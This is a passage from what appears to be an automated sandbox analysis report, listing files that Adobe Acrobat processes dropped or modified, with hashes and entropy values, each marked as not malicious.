Size (bytes): | 295 |
Entropy (8bit): | 5.143855352469607 |
Encrypted: | false |
SSDEEP: | 6:iO4T+q2PN72nKuAl9OmbnIFUtS+E0Zmws+EUVkwON72nKuAl9OmbjLJ:7jvVaHAahFUtzE0/VE05OaHAaSJ |
MD5: | 968109705A63B89310059F7E61C8320C |
SHA1: | 50685F48025CF81B7B2375FD4A54F353ACD5626C |
SHA-256: | AB410B3F2B11E9FA7526730622B66509C1F18A5253B29F5AA5679E63DA07E17C |
SHA-512: | A938C350CBAB4CA6A83D8FEF4A50CA7AA164F2ACE921BEDF08A27F8B2379D29481F967A6C02016311AB5B9F60EB64B7528F9BB2D3E827F3FF2D61F9E85C2774B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.143855352469607 |
Encrypted: | false |
SSDEEP: | 6:iO4T+q2PN72nKuAl9OmbnIFUtS+E0Zmws+EUVkwON72nKuAl9OmbjLJ:7jvVaHAahFUtzE0/VE05OaHAaSJ |
MD5: | 968109705A63B89310059F7E61C8320C |
SHA1: | 50685F48025CF81B7B2375FD4A54F353ACD5626C |
SHA-256: | AB410B3F2B11E9FA7526730622B66509C1F18A5253B29F5AA5679E63DA07E17C |
SHA-512: | A938C350CBAB4CA6A83D8FEF4A50CA7AA164F2ACE921BEDF08A27F8B2379D29481F967A6C02016311AB5B9F60EB64B7528F9BB2D3E827F3FF2D61F9E85C2774B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.11101478419675 |
Encrypted: | false |
SSDEEP: | 6:iO4YdF1v4q2PN72nKuAl9Ombzo2jMGIFUtSf3JZmwsYDkwON72nKuAl9Ombzo2jz:7FUvVaHAa8uFUt0Z/f5OaHAa8RJ |
MD5: | 3D7DF07E28FDD59419BDAC1D0EF0175F |
SHA1: | FF3BB9FF3E89F846A9389B4BBA4ABD79A9022C16 |
SHA-256: | BD29FD9DE8AFB3C1D5FB2FF1E6DC207DA4A8B6061C68786F48C746C74CB4D582 |
SHA-512: | B1F83B78707103CCACC615B34E2D69C03CCFF2C21F4255651765A2A7F9D292F96F0AB8B86B266D357097617F2F7FFBA7040C62A3752DE3F42E39B50000C96D03 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.11101478419675 |
Encrypted: | false |
SSDEEP: | 6:iO4YdF1v4q2PN72nKuAl9Ombzo2jMGIFUtSf3JZmwsYDkwON72nKuAl9Ombzo2jz:7FUvVaHAa8uFUt0Z/f5OaHAa8RJ |
MD5: | 3D7DF07E28FDD59419BDAC1D0EF0175F |
SHA1: | FF3BB9FF3E89F846A9389B4BBA4ABD79A9022C16 |
SHA-256: | BD29FD9DE8AFB3C1D5FB2FF1E6DC207DA4A8B6061C68786F48C746C74CB4D582 |
SHA-512: | B1F83B78707103CCACC615B34E2D69C03CCFF2C21F4255651765A2A7F9D292F96F0AB8B86B266D357097617F2F7FFBA7040C62A3752DE3F42E39B50000C96D03 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\98a02634-b709-4d55-a628-a3cd005ac5ec.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.968015424318641 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqeEsBdOg2H4caq3QYiubcP7E4T3y:Y2sRdsHdMHz3QYhbA7nby |
MD5: | 0208657AE2DF908693073D0B396BDE31 |
SHA1: | CE5611CBDC099FE7B359C29607AB0D1811D1AC90 |
SHA-256: | 5C3D71703BFB9C8D3C566B0AB02D67941F311A73E189B0B828578DF49F55F034 |
SHA-512: | CE916D45783A08B749092239783FA7E118CCF9614A53FC583C788C6F3A550097AEC1C1E47F7EF378596786CB0B2F44A125F3B31090525D43E1D3955416BB7DF6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.968015424318641 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqeEsBdOg2H4caq3QYiubcP7E4T3y:Y2sRdsHdMHz3QYhbA7nby |
MD5: | 0208657AE2DF908693073D0B396BDE31 |
SHA1: | CE5611CBDC099FE7B359C29607AB0D1811D1AC90 |
SHA-256: | 5C3D71703BFB9C8D3C566B0AB02D67941F311A73E189B0B828578DF49F55F034 |
SHA-512: | CE916D45783A08B749092239783FA7E118CCF9614A53FC583C788C6F3A550097AEC1C1E47F7EF378596786CB0B2F44A125F3B31090525D43E1D3955416BB7DF6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.24917126437982 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE78l8:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhF |
MD5: | 8EC8709CE110E9D89AC31ABD1CDDB103 |
SHA1: | 1A3B24255E195AF9FC5DA0895720A7E7F726BC82 |
SHA-256: | 93CED196A8EEF0F6571681B24C9CD5B9B9B3743CFF3DEBB4CF4A97CC0FB94BA5 |
SHA-512: | BD26399480253B2EFC28A99A05BAEA389F61253C82384DD2D9CAFD97639C31AC8EFB1351E42F69CFA81E2C750F8045D781729D8BD08EF13A4683B2BBD0FFE4F8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.077853949347695 |
Encrypted: | false |
SSDEEP: | 6:iO4QRJV34q2PN72nKuAl9OmbzNMxIFUtSQkJZmwsQfzDkwON72nKuAl9OmbzNMFd:7xRUvVaHAa8jFUtjG/Vv5OaHAa84J |
MD5: | 563322237FE56E239789C5255E531334 |
SHA1: | 3E3382300546AD41E50C9DF1F841B4B65D718BAB |
SHA-256: | 7207AB0D0CF3361C3529404920445CF9452178C9A95CC6DB3167239EED5A7EEE |
SHA-512: | 1170A8CC86CAA3D65D283223353759D5A9E03FF236246FB4D03C8EAAD291B255890C092ADED070A380A4438AA2217C268F6762653DF5FF6746BCA08B6976AB94 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.077853949347695 |
Encrypted: | false |
SSDEEP: | 6:iO4QRJV34q2PN72nKuAl9OmbzNMxIFUtSQkJZmwsQfzDkwON72nKuAl9OmbzNMFd:7xRUvVaHAa8jFUtjG/Vv5OaHAa84J |
MD5: | 563322237FE56E239789C5255E531334 |
SHA1: | 3E3382300546AD41E50C9DF1F841B4B65D718BAB |
SHA-256: | 7207AB0D0CF3361C3529404920445CF9452178C9A95CC6DB3167239EED5A7EEE |
SHA-512: | 1170A8CC86CAA3D65D283223353759D5A9E03FF236246FB4D03C8EAAD291B255890C092ADED070A380A4438AA2217C268F6762653DF5FF6746BCA08B6976AB94 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444456739326013 |
Encrypted: | false |
SSDEEP: | 384:Se/ci5tliBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:vOs3OazzU89UTTgUL |
MD5: | 2F12835EE5758A373C90AAE841F114F7 |
SHA1: | 26CECFAE0209BB70235344CD9253A9174558C1FE |
SHA-256: | 1BF7F555CB4923465841573296D90A973DC014789188BFB5A234B1EF55656218 |
SHA-512: | AA676F660D6B05C828390F4762AAB6D2C0CF0509043885A625ABEE4AEF04F21C4EEF66F4A9217546770F4C291A093B647613DB62545679CA3665378A8A348021 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213361440098803 |
Encrypted: | false |
SSDEEP: | 24:7+t4gnuwKFqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MA:7MDnCFqPmFTIF3XmHjBoGGR+jMz+Lhd |
MD5: | B482F820D6375A82F1EB153668366BE5 |
SHA1: | 11036F9B3CFF3A95B7564ABB44E237128638162D |
SHA-256: | A199C677FECADA96B4C25134F9AECE761CDDB9BBDD0249082A36036DD1C28513 |
SHA-512: | 6D0811BDD55B18C1220F51B30B858286E4FB29950B44C76D2D8B40CCB6CAD43FEECF5B5BB06A0B979882D65C8C5B6C3612B83B10109F417B17968B378ED6ABBB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7647458239154146 |
Encrypted: | false |
SSDEEP: | 3:kkFklvxMd8ttfllXlE/HT8k2Iz1NNX8RolJuRdxLlGB9lQRYwpDdt:kKLdUeT8g3NMa8RdWBwRd |
MD5: | C3F64052513B0DDD43071E8387CD5BC5 |
SHA1: | 2505DEA141E89E0A2D8B78E984DDD53D4A2196E3 |
SHA-256: | 78A8C01464806227A4066324126BEF54AEC84996A0468930E0EDAA6A6894752D |
SHA-512: | 3C5282FCA3FF3425F60F6FB5D9BE545C9C3AE07C62C4FFB1B42D02044C1A3BC9F06181C1FF4D3C5F727F1FF64F973C28C20CC7C34053E2B77C72F3E4DF39B2D4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.349911282502173 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJM3g98kUwPeUkwRe9:YvXKXO/PVYGcmZGMbLUkee9 |
MD5: | A76E28A4F29F2B092D06D5C77237D537 |
SHA1: | C05DF5C459CA9AA21FAEF3C9A74E1558EA1C6F3B |
SHA-256: | 22556BD903ED8065C1684CF8AB43BA76E976098AA13800FE512A9759719968ED |
SHA-512: | A639F7127BA19BD33144F69D3F0A7FBD33915D78A560A152316B751A00245E3D4D95DD57B7D822F77EDC1DCBF6B6E238E1466D11885F05A541D942B3FB2D2611 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.301298483432573 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfBoTfXpnrPeUkwRe9:YvXKXO/PVYGcmZGWTfXcUkee9 |
MD5: | 5625EE94136676ABF9D7677614EA6242 |
SHA1: | DC509880081F9891A4ECFFD63F64610537A5DC8E |
SHA-256: | 44C7A6EA0EC2B88759E54CBE38271CB8CF232CA87ADC29929979E01D83314836 |
SHA-512: | 687918BAE3BA4E52BFD4C841535854C89788B8F0D17541C4AB90770D1C07D885CFEC420E21F28D1AFA0370D5657ACF2F9B12C882FEFD7F2C30DD53E7C7E90B67 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.281316200248932 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfBD2G6UpnrPeUkwRe9:YvXKXO/PVYGcmZGR22cUkee9 |
MD5: | E0C318757C58FFE77EB7DDE70D093DAA |
SHA1: | 97683AEF949B34F0D22A2624A3E132EB2FD01CC6 |
SHA-256: | ECD7A1BF02A28BA09322C2B7AA26E1A71928392D6B66A77719C9F302DB7D97B7 |
SHA-512: | B6C8FAF6C4B9C0B3B9C480A85A4F8BF5419EB9015BF45257430BD883FFD64D91D00CCBC1B17491730E7079B9758EE56E6CEF0FF810EB4533AFA237CA52273F0A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.329461854523478 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfPmwrPeUkwRe9:YvXKXO/PVYGcmZGH56Ukee9 |
MD5: | 40FE984749DF7EB1C0A839B9FF94F46C |
SHA1: | 594CD609A7D65952C3064128DAC9A7F115320EFD |
SHA-256: | B010C4B83B6DCDAD75F27E813816A6530A319624DA36815C453F2F897FBA39A8 |
SHA-512: | CB6A7F4C2286E9CCCCEBC87F184017DC2248B8ADA52A08AAEA81AA1B20FB47241ED6F8469DEDAB88F0FD4DFE988835B901305421081951AF78C0C3C87E6D4AE3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.688374262916484 |
Encrypted: | false |
SSDEEP: | 24:Yv6XO+7DpLgE9cQx8LennAvzBvkn0RCmK8czOCCSu:Yvn+nhgy6SAFv5Ah8cv/u |
MD5: | F2D8DB6BB8585B83A34635E17ABBAB11 |
SHA1: | A4ABF03412110A5F178135D01E0B2C862B288D69 |
SHA-256: | B9B86C9AE391774DD8DEA727BDF532D0173AFFE30878FF4FBBFD7A3A7FFE2A5D |
SHA-512: | C841BB2DD7B443FC4A577B262F2FBA5F5BB6E4A08AF9A87EAC832720267A8A94440499C13E48ECA74B7B75D32A93C0DADD9CE5B1343815714376F1FDDA9DBB71 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.277885046333087 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJf8dPeUkwRe9:YvXKXO/PVYGcmZGU8Ukee9 |
MD5: | 8BF110CBC9D87F9493545F07D3862EAF |
SHA1: | 9D0DF931974DC26BAA4469E7A4571D9464291239 |
SHA-256: | CAAE1741B7E85683DED74F019EC7EC32880D91A05748446397C08001BC9F164A |
SHA-512: | 924864F9DEB2FC77ED4A6129450F8DC16CC282EBC289688CF64AD220AB754DEA6B66C750E01E71ACB6135FC8276CE58C6758D3A11DB3EB44F051514E0C2FC777 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.280229721227242 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfQ1rPeUkwRe9:YvXKXO/PVYGcmZGY16Ukee9 |
MD5: | CB9013E4171F82412F559F7E217CCFF7 |
SHA1: | 5E8ABD03CD3323B86C2E60400D596A4CC08CBDB7 |
SHA-256: | D2EE3A6F48AB30B6C927E7BCC5C81DE13D21BE5DC9F253B824F51D77D43D023C |
SHA-512: | 5CADBDA8543730159DC9C6F1E1755E661B876B1C9FF5C99ABA8CE5A75846B22F54668FBBEE4F60097981C4FF22405D6CC9086A7B1FAF0D837E57DC5DC7962C51 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.2873137308996325 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfFldPeUkwRe9:YvXKXO/PVYGcmZGz8Ukee9 |
MD5: | 762BF7728220ECF14BDF355CBDDAF5DA |
SHA1: | CF564F989F2E5AE3375E684CBE25BC64FAA82E23 |
SHA-256: | F08DD3CC5FDBE1755B800A1C42F596C9D9E4D8B0064A5263C4BD13A648FB3751 |
SHA-512: | A0CCE4D2AA5D992B73233269659D58C5495CBE338AE94A1CDB3AF132448140841725BD4CE79A3C0B67B0E3487E54F9D61CD463A221253AFCECE8D5922348625F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3034476825635695 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfzdPeUkwRe9:YvXKXO/PVYGcmZGb8Ukee9 |
MD5: | 910F22EA2802E287A041FA3A2E8636E6 |
SHA1: | C7B235F4BB24C0BC448E4762F2C8F8A0EFFF4FD9 |
SHA-256: | 76DBF8DB441CA16032B71BE2B22469001B4A243B7FB2DFE93CEA035E707957A4 |
SHA-512: | B9203C3835F3420F30E12AC40B9FB4C6B380ABDD773C8DF9C77CE9DF98A727BB742D41BB8402B4C94F4267AC79A2FD8002B554DEE4BA425D642673E27550B6F7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.283760990630925 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfYdPeUkwRe9:YvXKXO/PVYGcmZGg8Ukee9 |
MD5: | 323765C60F339C83130067B0A029C6A9 |
SHA1: | E0E0429B3D1E9E28722BC7EA75CF7E9AB35A23B6 |
SHA-256: | EDBDD11445500DF05FB2A2F416A5A08C32EAFB235FD230B02957C95801714944 |
SHA-512: | 425B25E8C4BA73A1C40F5426E41A276E1EE08D9BFE661F0DE98B2DE8B38E5035AE68601DF24A235AB208EC940D5A000DDFBA98FA4A2768F51FA7FCA5E8CB9403 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.270374306391185 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJf+dPeUkwRe9:YvXKXO/PVYGcmZG28Ukee9 |
MD5: | 4822B3F9E5350E9F31C9E16F01BC38FC |
SHA1: | 3A586493DBFF2C03DEF98477F87F42BCE8DE9DF0 |
SHA-256: | 9BF1E2B72A606CF60D95750B6E19A83E44707DB74C4688B722347C368C6A1D4E |
SHA-512: | 92ADB63EFF7DF31D9926B84DD605D30CEBE60773A7BAF94EEEC3B713BD2453E37311D118E63F5EA5111157B85D1EB0FAE49F7114CAD7BF9F31E69ACB896076A8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.267419696616602 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJfbPtdPeUkwRe9:YvXKXO/PVYGcmZGDV8Ukee9 |
MD5: | D3ED9615831B5CB6D006CBB8AED1AA70 |
SHA1: | 48BEBEB412A1EC8A7CF779FB2CC3266DFE72A975 |
SHA-256: | 499F1451A772F1B00DB8E94D2F22104E705532D650CA334E19F0E14EA70DACD3 |
SHA-512: | 64046E7A600652BA597B509DE8B03F2EE2D9A19712DAF3908C3EA956F32799887CD97FFB8DD532D4C36843862163BB8E2F68106EF11FE827502DAF6B3102A9D9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.270576244790009 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXlUcpgioVYGnZiQ0Y3qoAvJf21rPeUkwRe9:YvXKXO/PVYGcmZG+16Ukee9 |
MD5: | A7E05C1BCC990237A0101C43BB716543 |
SHA1: | 6550E82A4F5A3F9B814CB5AEB146A5661C3A490F |
SHA-256: | 0C5D6271AD74EB77C0B07C7F1EA48C0F1EFC94CFDF4EF8718179426CA0CB3D56 |
SHA-512: | 0A0ECB5F3F069D7D069569529762A8641C730923697FABF78DDA72CE0A8A7543826056746AAFE3697E5D091E383657E9B87D6D124149DEB19DDD0A4D433449DD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.662891131533986 |
Encrypted: | false |
SSDEEP: | 24:Yv6XO+7zamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSu:Yvn+3BgkDMUJUAh8cvMu |
MD5: | B795ECE74012AE769CB861EDC228FC32 |
SHA1: | 4072EAA93F20C078B0A71CF75FA19DD9D69C89E8 |
SHA-256: | 5005352934950511D4D7BFD606460805F8448AD5E9B181FE38A605F13A3985C9 |
SHA-512: | 20CA3A491BF4EA1279B187DC758041097B7203B97AEE9FF2924903E28A0A510EE2AF8CF591CBFB1D3894EDE437D5ADC504CB009CFDF11E874AD8EB2DF6BC327E |
Malicious: | false |
Preview: |
